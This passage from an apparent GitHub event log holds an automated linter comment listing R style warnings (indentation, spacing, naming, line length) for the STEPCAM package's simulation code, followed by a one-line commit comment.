*style:* **Variable and function names should be all lowercase.**\n```r\n​    nextComp <- 1:numParticles\n    ^~~~~~~~\n```\n[R/ABC_SMC.R:264:19:](https://github.com/thijsjanzen/STEPCAM/blob/0e18e0dd9a1260bc685daeab5a021d6643f34a42/R/ABC_SMC.R#L264) *style:* **Variable and function names should be all lowercase.**\n```r\n​    nextComp <- 1:numParticles\n                  ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:271:61:](https://github.com/thijsjanzen/STEPCAM/blob/0e18e0dd9a1260bc685daeab5a021d6643f34a42/R/ABC_SMC.R#L271) *style:* **Put spaces around all infix operators.**\n```r\n​    d <- read.table(paste(\"particles_t=\", t - 2, \".txt\", sep=\"\",\n                                                           ~^~\n```\n[R/ABC_SMC.R:275:63:](https://github.com/thijsjanzen/STEPCAM/blob/0e18e0dd9a1260bc685daeab5a021d6643f34a42/R/ABC_SMC.R#L275) *style:* **Put spaces around all infix operators.**\n```r\n​      d <- read.table(paste(\"particles_t=\", t - 1, \".txt\", sep=\"\",\n                                                             ~^~\n```\n[R/ABC_SMC.R:278:15:](https://github.com/thijsjanzen/STEPCAM/blob/0e18e0dd9a1260bc685daeab5a021d6643f34a42/R/ABC_SMC.R#L278) *style:* **Put spaces around all infix operators.**\n```r\n​\t    d <- read.table(paste(\"particles_t=\", t, \".txt\", sep=\"\",\n             ~^~~\n```\n[R/ABC_SMC.R:279:44:](https://github.com/thijsjanzen/STEPCAM/blob/0e18e0dd9a1260bc685daeab5a021d6643f34a42/R/ABC_SMC.R#L279) *style:* **Put spaces around all infix operators.**\n```r\n​\t                          collapse = NULL), header = F)\n                                          ~^\n```\n[R/generateArtificialData.R:4:1:](https://github.com/thijsjanzen/STEPCAM/blob/0e18e0dd9a1260bc685daeab5a021d6643f34a42/R/generateArtificialData.R#L4) *style:* **Words within variable and function names should be separated by '_' rather than '.'.**\n```r\n​generate.Artificial.Data <- function(n_species, n_traits, n_communities,\n^~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/generateArtificialData.R:6:1:](https://github.com/thijsjanzen/STEPCAM/blob/0e18e0dd9a1260bc685daeab5a021d6643f34a42/R/generateArtificialData.R#L6) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tpool_richness <- n_species\n^\n```\n[R/generateArtificialData.R:8:1:](https://github.com/thijsjanzen/STEPCAM/blob/0e18e0dd9a1260bc685daeab5a021d6643f34a42/R/generateArtificialData.R#L8) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\ttraits_pool <- matrix( round( rnorm(n = (pool_richness * n_traits),\n^\n```\n[R/generateArtificialData.R:9:1:](https://github.com/thijsjanzen/STEPCAM/blob/0e18e0dd9a1260bc685daeab5a021d6643f34a42/R/generateArtificialData.R#L9) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t                                    mean = 0, sd = 1), 3),\n^\n```\n[R/generateArtificialData.R:9:23:](https://github.com/thijsjanzen/STEPCAM/blob/0e18e0dd9a1260bc685daeab5a021d6643f34a42/R/generateArtificialData.R#L9) *style:* **Put spaces around all infix operators.**\n```r\n​\tpool_richness <- n_species\n                     ~^~~\n```\n[R/generateArtificialData.R:10:1:](https://github.com/thijsjanzen/STEPCAM/blob/0e18e0dd9a1260bc685daeab5a021d6643f34a42/R/generateArtificialData.R#L10) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t                       ncol = n_traits, nrow = pool_richness)\n^\n```\n[R/generateArtificialData.R:11:21:](https://github.com/thijsjanzen/STEPCAM/blob/0e18e0dd9a1260bc685daeab5a021d6643f34a42/R/generateArtificialData.R#L11) *style:* **Put spaces around all infix operators.**\n```r\n​\ttraits_pool <- matrix( round( rnorm(n = (pool_richness * n_traits),\n                   ~^~~\n```\n[R/generateArtificialData.R:11:47:](https://github.com/thijsjanzen/STEPCAM/blob/0e18e0dd9a1260bc685daeab5a021d6643f34a42/R/generateArtificialData.R#L11) *style:* **Put spaces around all infix operators.**\n```r\n​\ttraits_pool <- matrix( round( rnorm(n = (pool_richness * n_traits),\n                                             ~^~\n```\n[R/generateArtificialData.R:11:49:](https://github.com/thijsjanzen/STEPCAM/blob/0e18e0dd9a1260bc685daeab5a021d6643f34a42/R/generateArtificialData.R#L11) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\ttraits_pool <- matrix( round( rnorm(n = (pool_richness * n_traits),\n                                                ^\n```\n[R/generateArtificialData.R:11:64:](https://github.com/thijsjanzen/STEPCAM/blob/0e18e0dd9a1260bc685daeab5a021d6643f34a42/R/generateArtificialData.R#L11) *style:* **Put spaces around all infix operators.**\n```r\n​\ttraits_pool <- matrix( round( rnorm(n = (pool_richness * n_traits),\n                                                              ~^~\n```\n[R/generateArtificialData.R:12:50:](https://github.com/thijsjanzen/STEPCAM/blob/0e18e0dd9a1260bc685daeab5a021d6643f34a42/R/generateArtificialData.R#L12) *style:* **Put spaces around all infix operators.**\n```r\n​\t                                    mean = 0, sd = 1), 3),\n                                                ~^~\n```\n[R/generateArtificialData.R:12:58:](https://github.com/thijsjanzen/STEPCAM/blob/0e18e0dd9a1260bc685daeab5a021d6643f34a42/R/generateArtificialData.R#L12) *style:* **Put spaces around all infix operators.**\n```r\n​\t                                    mean = 0, sd = 1), 3),\n                                                        ~^~\n```\n[R/generateArtificialData.R:13:1:](https://github.com/thijsjanzen/STEPCAM/blob/0e18e0dd9a1260bc685daeab5a021d6643f34a42/R/generateArtificialData.R#L13) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tfor(i in 1:pool_richness) {\n^\n```\n[R/generateArtificialData.R:13:37:](https://github.com/thijsjanzen/STEPCAM/blob/0e18e0dd9a1260bc685daeab5a021d6643f34a42/R/generateArtificialData.R#L13) *style:* **Put spaces around all infix operators.**\n```r\n​\t                       ncol = n_traits, nrow = pool_richness)\n                                   ~^~\n```\n[R/generateArtificialData.R:13:54:](https://github.com/thijsjanzen/STEPCAM/blob/0e18e0dd9a1260bc685daeab5a021d6643f34a42/R/generateArtificialData.R#L13) *style:* **Put spaces around all infix operators.**\n```r\n​\t                       ncol = n_traits, nrow = pool_richness)\n                                                    ~^~\n```\n[R/generateArtificialData.R:14:1:](https://github.com/thijsjanzen/STEPCAM/blob/0e18e0dd9a1260bc685daeab5a021d6643f34a42/R/generateArtificialData.R#L14) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t  column1[i] <- paste(\"species\", i, sep = \"\")\n^\n```\n[R/generateArtificialData.R:15:1:](https://github.com/thijsjanzen/STEPCAM/blob/0e18e0dd9a1260bc685daeab5a021d6643f34a42/R/generateArtificialData.R#L15) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t}\n^\n```\n[R/generateArtificialData.R:16:1:](https://github.com/thijsjanzen/STEPCAM/blob/0e18e0dd9a1260bc685daeab5a021d6643f34a42/R/generateArtificialData.R#L16) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\trow1 <- rep(NA, (n_traits + 1))\n^\n```\n[R/generateArtificialData.R:16:12:](https://github.com/thijsjanzen/STEPCAM/blob/0e18e0dd9a1260bc685daeab5a021d6643f34a42/R/generateArtificialData.R#L16) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tfor(i in 1:pool_richness) {\n           ^\n```\n[R/generateArtificialData.R:17:1:](https://github.com/thijsjanzen/STEPCAM/blob/0e18e0dd9a1260bc685daeab5a021d6643f34a42/R/generateArtificialData.R#L17) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tfor(i in 1:n_traits + 1) {\n^\n```\n[R/generateArtificialData.R:17:22:](https://github.com/thijsjanzen/STEPCAM/blob/0e18e0dd9a1260bc685daeab5a021d6643f34a42/R/generateArtificialData.R#L17) *style:* **Put spaces around all infix operators.**\n```r\n​\t  column1[i] <- paste(\"species\", i, sep = \"\")\n                    ~^~~\n```\n[R/generateArtificialData.R:18:1:](https://github.com/thijsjanzen/STEPCAM/blob/0e18e0dd9a1260bc685daeab5a021d6643f34a42/R/generateArtificialData.R#L18) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t  row1[i] <- paste(\"trait\", (i - 1), sep=\"\")\n^\n```\n[R/generateArtificialData.R:19:1:](https://github.com/thijsjanzen/STEPCAM/blob/0e18e0dd9a1260bc685daeab5a021d6643f34a42/R/generateArtificialData.R#L19) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t}\n^\n```\n[R/generateArtificialData.R:19:14:](https://github.com/thijsjanzen/STEPCAM/blob/0e18e0dd9a1260bc685daeab5a021d6643f34a42/R/generateArtificialData.R#L19) *style:* **Put spaces around all infix operators.**\n```r\n​\trow1 <- rep(NA, (n_traits + 1))\n            ~^~~\n```\n[R/generateArtificialData.R:19:25:](https://github.com/thijsjanzen/STEPCAM/blob/0e18e0dd9a1260bc685daeab5a021d6643f34a42/R/generateArtificialData.R#L19) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\trow1 <- rep(NA, (n_traits + 1))\n                        ^\n```\n[R/generateArtificialData.R:20:1:](https://github.com/thijsjanzen/STEPCAM/blob/0e18e0dd9a1260bc685daeab5a021d6643f34a42/R/generateArtificialData.R#L20) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\trow1[1] <- \"species\"\n^\n```\n[R/generateArtificialData.R:20:12:](https://github.com/thijsjanzen/STEPCAM/blob/0e18e0dd9a1260bc685daeab5a021d6643f34a42/R/generateArtificialData.R#L20) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tfor(i in 1:n_traits + 1) {\n           ^\n```\n[R/generateArtificialData.R:21:1:](https://github.com/thijsjanzen/STEPCAM/blob/0e18e0dd9a1260bc685daeab5a021d6643f34a42/R/generateArtificialData.R#L21) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tcolumns <- matrix(cbind(column1, traits_pool), ncol = (n_traits + 1))\n^\n```\n[R/generateArtificialData.R:21:19:](https://github.com/thijsjanzen/STEPCAM/blob/0e18e0dd9a1260bc685daeab5a021d6643f34a42/R/generateArtificialData.R#L21) *style:* **Put spaces around all infix operators.**\n```r\n​\t  row1[i] <- paste(\"trait\", (i - 1), sep=\"\")\n                 ~^~~\n```\n[R/generateArtificialData.R:21:37:](https://github.com/thijsjanzen/STEPCAM/blob/0e18e0dd9a1260bc685daeab5a021d6643f34a42/R/generateArtificialData.R#L21) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t  row1[i] <- paste(\"trait\", (i - 1), sep=\"\")\n                                    ^\n```\n[R/generateArtificialData.R:21:40:](https://github.com/thijsjanzen/STEPCAM/blob/0e18e0dd9a1260bc685daeab5a021d6643f34a42/R/generateArtificialData.R#L21) *style:* **Put spaces around all infix operators.**\n```r\n​\t  row1[i] <- paste(\"trait\", (i - 1), sep=\"\")\n                                      ~^~\n```\n[R/generateArtificialData.R:22:1:](https://github.com/thijsjanzen/STEPCAM/blob/0e18e0dd9a1260bc685daeab5a021d6643f34a42/R/generateArtificialData.R#L22) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\ttraits_pool_df <- as.data.frame(columns)\n^\n```\n[R/generateArtificialData.R:23:1:](https://github.com/thijsjanzen/STEPCAM/blob/0e18e0dd9a1260bc685daeab5a021d6643f34a42/R/generateArtificialData.R#L23) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tnames(traits_pool_df) <- row1\n^\n```\n[R/generateArtificialData.R:23:17:](https://github.com/thijsjanzen/STEPCAM/blob/0e18e0dd9a1260bc685daeab5a021d6643f34a42/R/generateArtificialData.R#L23) *style:* **Put spaces around all infix operators.**\n```r\n​\trow1[1] <- \"species\"\n               ~^~~\n```\n[R/generateArtificialData.R:24:17:](https://github.com/thijsjanzen/STEPCAM/blob/0e18e0dd9a1260bc685daeab5a021d6643f34a42/R/generateArtificialData.R#L24) *style:* **Put spaces around all infix operators.**\n```r\n​\tcolumns <- matrix(cbind(column1, traits_pool), ncol = (n_traits + 1))\n               ~^~~\n```\n[R/generateArtificialData.R:24:61:](https://github.com/thijsjanzen/STEPCAM/blob/0e18e0dd9a1260bc685daeab5a021d6643f34a42/R/generateArtificialData.R#L24) *style:* **Put spaces around all infix operators.**\n```r\n​\tcolumns <- matrix(cbind(column1, traits_pool), ncol = (n_traits + 1))\n                                                           ~^~\n```\n[R/generateArtificialData.R:24:63:](https://github.com/thijsjanzen/STEPCAM/blob/0e18e0dd9a1260bc685daeab5a021d6643f34a42/R/generateArtificialData.R#L24) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tcolumns <- matrix(cbind(column1, traits_pool), ncol = (n_traits + 1))\n                                                              ^\n```\n[R/generateArtificialData.R:25:1:](https://github.com/thijsjanzen/STEPCAM/blob/0e18e0dd9a1260bc685daeab5a021d6643f34a42/R/generateArtificialData.R#L25) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tcomm_spec_matrix <- matrix(rep(0, (n_communities * pool_richness)),\n^\n```\n[R/generateArtificialData.R:25:24:](https://github.com/thijsjanzen/STEPCAM/blob/0e18e0dd9a1260bc685daeab5a021d6643f34a42/R/generateArtificialData.R#L25) *style:* **Put spaces around all infix operators.**\n```r\n​\ttraits_pool_df <- as.data.frame(columns)\n                      ~^~~\n```\n[R/generateArtificialData.R:26:31:](https://github.com/thijsjanzen/STEPCAM/blob/0e18e0dd9a1260bc685daeab5a021d6643f34a42/R/generateArtificialData.R#L26) *style:* **Put spaces around all infix operators.**\n```r\n​\tnames(traits_pool_df) <- row1\n                             ~^~~\n```\n[R/generateArtificialData.R:28:1:](https://github.com/thijsjanzen/STEPCAM/blob/0e18e0dd9a1260bc685daeab5a021d6643f34a42/R/generateArtificialData.R#L28) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\toccurence <- 10^rnorm(pool_richness, mean = 0, sd = occurence_distribution)\n^\n```\n[R/generateArtificialData.R:28:26:](https://github.com/thijsjanzen/STEPCAM/blob/0e18e0dd9a1260bc685daeab5a021d6643f34a42/R/generateArtificialData.R#L28) *style:* **Put spaces around all infix operators.**\n```r\n​\tcomm_spec_matrix <- matrix(rep(0, (n_communities * pool_richness)),\n                        ~^~~\n```\n[R/generateArtificialData.R:28:43:](https://github.com/thijsjanzen/STEPCAM/blob/0e18e0dd9a1260bc685daeab5a021d6643f34a42/R/generateArtificialData.R#L28) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tcomm_spec_matrix <- matrix(rep(0, (n_communities * pool_richness)),\n                                          ^\n```\n[R/generateArtificialData.R:28:58:](https://github.com/thijsjanzen/STEPCAM/blob/0e18e0dd9a1260bc685daeab5a021d6643f34a42/R/generateArtificialData.R#L28) *style:* **Put spaces around all infix operators.**\n```r\n​\tcomm_spec_matrix <- matrix(rep(0, (n_communities * pool_richness)),\n                                                        ~^~\n```\n[R/generateArtificialData.R:30:1:](https://github.com/thijsjanzen/STEPCAM/blob/0e18e0dd9a1260bc685daeab5a021d6643f34a42/R/generateArtificialData.R#L30) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * (sd_richness * pool_richness) +\n^\n```\n[R/generateArtificialData.R:31:19:](https://github.com/thijsjanzen/STEPCAM/blob/0e18e0dd9a1260bc685daeab5a021d6643f34a42/R/generateArtificialData.R#L31) *style:* **Put spaces around all infix operators.**\n```r\n​\toccurence <- 10^rnorm(pool_richness, mean = 0, sd = occurence_distribution)\n                 ~^~~\n```\n[R/generateArtificialData.R:31:24:](https://github.com/thijsjanzen/STEPCAM/blob/0e18e0dd9a1260bc685daeab5a021d6643f34a42/R/generateArtificialData.R#L31) *style:* **Put spaces around all infix operators.**\n```r\n​\toccurence <- 10^rnorm(pool_richness, mean = 0, sd = occurence_distribution)\n                      ~^~\n```\n[R/generateArtificialData.R:31:51:](https://github.com/thijsjanzen/STEPCAM/blob/0e18e0dd9a1260bc685daeab5a021d6643f34a42/R/generateArtificialData.R#L31) *style:* **Put spaces around all infix operators.**\n```r\n​\toccurence <- 10^rnorm(pool_richness, mean = 0, sd = occurence_distribution)\n                                                 ~^~\n```\n[R/generateArtificialData.R:31:59:](https://github.com/thijsjanzen/STEPCAM/blob/0e18e0dd9a1260bc685daeab5a021d6643f34a42/R/generateArtificialData.R#L31) *style:* **Put spaces around all infix operators.**\n```r\n​\toccurence <- 10^rnorm(pool_richness, mean = 0, sd = occurence_distribution)\n                                                         ~^~\n```\n[R/generateArtificialData.R:32:1:](https://github.com/thijsjanzen/STEPCAM/blob/0e18e0dd9a1260bc685daeab5a021d6643f34a42/R/generateArtificialData.R#L32) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\trichness_values[which(richness_values > pool_richness)] <- pool_richness\n^\n```\n[R/generateArtificialData.R:33:1:](https://github.com/thijsjanzen/STEPCAM/blob/0e18e0dd9a1260bc685daeab5a021d6643f34a42/R/generateArtificialData.R#L33) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\trichness_values[which(richness_values < 0)] <- 0\n^\n```\n[R/generateArtificialData.R:33:1:](https://github.com/thijsjanzen/STEPCAM/blob/0e18e0dd9a1260bc685daeab5a021d6643f34a42/R/generateArtificialData.R#L33) *style:* **lines should not be more than 80 characters.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * (sd_richness * pool_richness) +\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/generateArtificialData.R:33:25:](https://github.com/thijsjanzen/STEPCAM/blob/0e18e0dd9a1260bc685daeab5a021d6643f34a42/R/generateArtificialData.R#L33) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * (sd_richness * pool_richness) +\n                       ~^~~\n```\n[R/generateArtificialData.R:33:34:](https://github.com/thijsjanzen/STEPCAM/blob/0e18e0dd9a1260bc685daeab5a021d6643f34a42/R/generateArtificialData.R#L33) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * (sd_richness * pool_richness) +\n                                 ^\n```\n[R/generateArtificialData.R:33:61:](https://github.com/thijsjanzen/STEPCAM/blob/0e18e0dd9a1260bc685daeab5a021d6643f34a42/R/generateArtificialData.R#L33) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * (sd_richness * pool_richness) +\n                                                           ~^~\n```\n[R/generateArtificialData.R:33:69:](https://github.com/thijsjanzen/STEPCAM/blob/0e18e0dd9a1260bc685daeab5a021d6643f34a42/R/generateArtificialData.R#L33) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * (sd_richness * pool_richness) +\n                                                                    ^~\n```\n[R/generateArtificialData.R:33:74:](https://github.com/thijsjanzen/STEPCAM/blob/0e18e0dd9a1260bc685daeab5a021d6643f34a42/R/generateArtificialData.R#L33) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * (sd_richness * pool_richness) +\n                                                                        ~^~\n```\n[R/generateArtificialData.R:33:76:](https://github.com/thijsjanzen/STEPCAM/blob/0e18e0dd9a1260bc685daeab5a021d6643f34a42/R/generateArtificialData.R#L33) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * (sd_richness * pool_richness) +\n                                                                           ^\n```\n[R/generateArtificialData.R:33:89:](https://github.com/thijsjanzen/STEPCAM/blob/0e18e0dd9a1260bc685daeab5a021d6643f34a42/R/generateArtificialData.R#L33) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * (sd_richness * pool_richness) +\n                                                                                       ~^~\n```\n[R/generateArtificialData.R:34:1:](https://github.com/thijsjanzen/STEPCAM/blob/0e18e0dd9a1260bc685daeab5a021d6643f34a42/R/generateArtificialData.R#L34) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tfor(i in 1:n_communities){\n^\n```\n[R/generateArtificialData.R:35:1:](https://github.com/thijsjanzen/STEPCAM/blob/0e18e0dd9a1260bc685daeab5a021d6643f34a42/R/generateArtificialData.R#L35) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t  if(mechanism_random == T){\n^\n```\n[R/generateArtificialData.R:35:47:](https://github.com/thijsjanzen/STEPCAM/blob/0e18e0dd9a1260bc685daeab5a021d6643f34a42/R/generateArtificialData.R#L35) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values[which(richness_values > pool_richness)] <- pool_richness\n                                             ~^~\n```\n[R/generateArtificialData.R:35:65:](https://github.com/thijsjanzen/STEPCAM/blob/0e18e0dd9a1260bc685daeab5a021d6643f34a42/R/generateArtificialData.R#L35) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values[which(richness_values > pool_richness)] <- pool_richness\n                                                               ~^~~\n```\n[R/generateArtificialData.R:36:1:](https://github.com/thijsjanzen/STEPCAM/blob/0e18e0dd9a1260bc685daeab5a021d6643f34a42/R/generateArtificialData.R#L36) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    present_species <- sample(c(1:pool_richness), richness_values[i],\n^\n```\n[R/generateArtificialData.R:36:47:](https://github.com/thijsjanzen/STEPCAM/blob/0e18e0dd9a1260bc685daeab5a021d6643f34a42/R/generateArtificialData.R#L36) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values[which(richness_values < 0)] <- 0\n                                             ~^\n```\n[R/generateArtificialData.R:37:12:](https://github.com/thijsjanzen/STEPCAM/blob/0e18e0dd9a1260bc685daeab5a021d6643f34a42/R/generateArtificialData.R#L37) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tfor(i in 1:n_communities){\n           ^\n```\n[R/generateArtificialData.R:38:1:](https://github.com/thijsjanzen/STEPCAM/blob/0e18e0dd9a1260bc685daeab5a021d6643f34a42/R/generateArtificialData.R#L38) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t  }else{\n^\n```\n[R/generateArtificialData.R:38:13:](https://github.com/thijsjanzen/STEPCAM/blob/0e18e0dd9a1260bc685daeab5a021d6643f34a42/R/generateArtificialData.R#L38) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t  if(mechanism_random == T){\n            ^\n```\n[R/generateArtificialData.R:39:1:](https://github.com/thijsjanzen/STEPCAM/blob/0e18e0dd9a1260bc685daeab5a021d6643f34a42/R/generateArtificialData.R#L39) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    opt_traits <- rnorm(n_traits, mean = 0, sd = 1)\n^\n```\n[R/generateArtificialData.R:39:29:](https://github.com/thijsjanzen/STEPCAM/blob/0e18e0dd9a1260bc685daeab5a021d6643f34a42/R/generateArtificialData.R#L39) *style:* **Put spaces around all infix operators.**\n```r\n​\t    present_species <- sample(c(1:pool_richness), richness_values[i],\n                           ~^~~\n```\n[R/generateArtificialData.R:40:1:](https://github.com/thijsjanzen/STEPCAM/blob/0e18e0dd9a1260bc685daeab5a021d6643f34a42/R/generateArtificialData.R#L40) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    opt_traits_matrix <- c()\n^\n```\n[R/generateArtificialData.R:41:1:](https://github.com/thijsjanzen/STEPCAM/blob/0e18e0dd9a1260bc685daeab5a021d6643f34a42/R/generateArtificialData.R#L41) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    for(j in 1:n_traits){\n^\n```\n[R/generateArtificialData.R:42:1:](https://github.com/thijsjanzen/STEPCAM/blob/0e18e0dd9a1260bc685daeab5a021d6643f34a42/R/generateArtificialData.R#L42) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t      for(k in 1:pool_richness){\n^\n```\n[R/generateArtificialData.R:42:24:](https://github.com/thijsjanzen/STEPCAM/blob/0e18e0dd9a1260bc685daeab5a021d6643f34a42/R/generateArtificialData.R#L42) *style:* **Put spaces around all infix operators.**\n```r\n​\t    opt_traits <- rnorm(n_traits, mean = 0, sd = 1)\n                      ~^~~\n```\n[R/generateArtificialData.R:42:48:](https://github.com/thijsjanzen/STEPCAM/blob/0e18e0dd9a1260bc685daeab5a021d6643f34a42/R/generateArtificialData.R#L42) *style:* **Put spaces around all infix operators.**\n```r\n​\t    opt_traits <- rnorm(n_traits, mean = 0, sd = 1)\n                                              ~^~\n```\n[R/generateArtificialData.R:43:1:](https://github.com/thijsjanzen/STEPCAM/blob/0e18e0dd9a1260bc685daeab5a021d6643f34a42/R/generateArtificialData.R#L43) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t      l <- (j - 1) * pool_richness + k\n^~\n```\n[R/generateArtificialData.R:44:1:](https://github.com/thijsjanzen/STEPCAM/blob/0e18e0dd9a1260bc685daeab5a021d6643f34a42/R/generateArtificialData.R#L44) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t      opt_traits_matrix[l] <- opt_traits[j]\n^~\n```\n[R/generateArtificialData.R:44:16:](https://github.com/thijsjanzen/STEPCAM/blob/0e18e0dd9a1260bc685daeab5a021d6643f34a42/R/generateArtificialData.R#L44) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t    for(j in 1:n_traits){\n               ^\n```\n[R/generateArtificialData.R:45:1:](https://github.com/thijsjanzen/STEPCAM/blob/0e18e0dd9a1260bc685daeab5a021d6643f34a42/R/generateArtificialData.R#L45) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t      }\n^\n```\n[R/generateArtificialData.R:45:18:](https://github.com/thijsjanzen/STEPCAM/blob/0e18e0dd9a1260bc685daeab5a021d6643f34a42/R/generateArtificialData.R#L45) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t      for(k in 1:pool_richness){\n                 ^\n```\n[R/generateArtificialData.R:46:1:](https://github.com/thijsjanzen/STEPCAM/blob/0e18e0dd9a1260bc685daeab5a021d6643f34a42/R/generateArtificialData.R#L46) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    }\n^\n```\n[R/generateArtificialData.R:46:25:](https://github.com/thijsjanzen/STEPCAM/blob/0e18e0dd9a1260bc685daeab5a021d6643f34a42/R/generateArtificialData.R#L46) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t      l <- (j - 1) * pool_richness + k\n                       ~^~~\n```\n[R/generateArtificialData.R:46:28:](https://github.com/thijsjanzen/STEPCAM/blob/0e18e0dd9a1260bc685daeab5a021d6643f34a42/R/generateArtificialData.R#L46) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t\t      l <- (j - 1) * pool_richness + k\n                           ^\n```\n[R/generateArtificialData.R:46:31:](https://github.com/thijsjanzen/STEPCAM/blob/0e18e0dd9a1260bc685daeab5a021d6643f34a42/R/generateArtificialData.R#L46) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t      l <- (j - 1) * pool_richness + k\n                             ~^~\n```\n[R/generateArtificialData.R:46:36:](https://github.com/thijsjanzen/STEPCAM/blob/0e18e0dd9a1260bc685daeab5a021d6643f34a42/R/generateArtificialData.R#L46) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t      l <- (j - 1) * pool_richness + k\n                                  ~^\n```\n[R/generateArtificialData.R:47:1:](https://github.com/thijsjanzen/STEPCAM/blob/0e18e0dd9a1260bc685daeab5a021d6643f34a42/R/generateArtificialData.R#L47) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    opt_traits_matrix <- matrix(opt_traits_matrix, ncol = n_traits)\n^\n```\n[R/generateArtificialData.R:47:44:](https://github.com/thijsjanzen/STEPCAM/blob/0e18e0dd9a1260bc685daeab5a021d6643f34a42/R/generateArtificialData.R#L47) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t      opt_traits_matrix[l] <- opt_traits[j]\n                                          ~^~~\n```\n[R/generateArtificialData.R:48:1:](https://github.com/thijsjanzen/STEPCAM/blob/0e18e0dd9a1260bc685daeab5a021d6643f34a42/R/generateArtificialData.R#L48) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    traits_distances <- abs(traits_pool - opt_traits_matrix)\n^\n```\n[R/generateArtificialData.R:49:1:](https://github.com/thijsjanzen/STEPCAM/blob/0e18e0dd9a1260bc685daeab5a021d6643f34a42/R/generateArtificialData.R#L49) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    trait_distances_onedimen <- c()\n^\n```\n[R/generateArtificialData.R:50:1:](https://github.com/thijsjanzen/STEPCAM/blob/0e18e0dd9a1260bc685daeab5a021d6643f34a42/R/generateArtificialData.R#L50) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    for(m in 1:pool_richness){\n^\n```\n[R/generateArtificialData.R:50:31:](https://github.com/thijsjanzen/STEPCAM/blob/0e18e0dd9a1260bc685daeab5a021d6643f34a42/R/generateArtificialData.R#L50) *style:* **Put spaces around all infix operators.**\n```r\n​\t    opt_traits_matrix <- matrix(opt_traits_matrix, ncol = n_traits)\n                             ~^~~\n```\n"}},"created_at":"2016-09-18T20:35:42Z"}
{"id":"4580581998","type":"CommitCommentEvent","actor":{"login":"derrickmeister"},"repo":{"name":"derrickmeister/DirectFromGitHubWeb"},"payload":{"comment":{"id":19072165,"position":null,"line":null,"path":null,"commit_id":"4727f233ba5c0ca5f39f5ac4d4547ee39246801e","created_at":"2016-09-18T20:35:58Z","updated_at":"2016-09-18T20:35:58Z","body":"Me leaving comment on my own commit...."}},"created_at":"2016-09-18T20:35:58Z"}
